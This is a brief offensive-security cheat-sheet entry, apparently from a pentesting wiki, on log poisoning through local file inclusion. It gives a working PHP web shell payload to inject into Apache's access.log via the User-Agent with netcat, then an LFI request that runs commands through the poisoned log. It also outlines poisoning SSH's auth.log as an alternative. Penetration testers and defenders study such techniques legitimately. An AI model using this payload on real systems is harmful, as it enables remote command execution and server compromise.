Log Poisoning
Log Poisoning occurs via LFI attack.
If you can access the file /var/log/apache2/access.log, you can inject a webshell as the User-Agent by using web proxy tools like Burpsuite and OWASP ZAP:
1) Locate a writable log file
/var/log/apache2/access.log2) Inject a payload
nc IP PORT<?php echo system($_GET['cmd']); ?>3) Execute via LFI
http://example.com/vulnerable.php?page=/path/to/log/access.log&cmd=whoamiAlternate poisoning method: SSH Log Poisoning
1) Locate the log file
2) Poison the auth.log file
3) Run commands via your webshell now
Last updated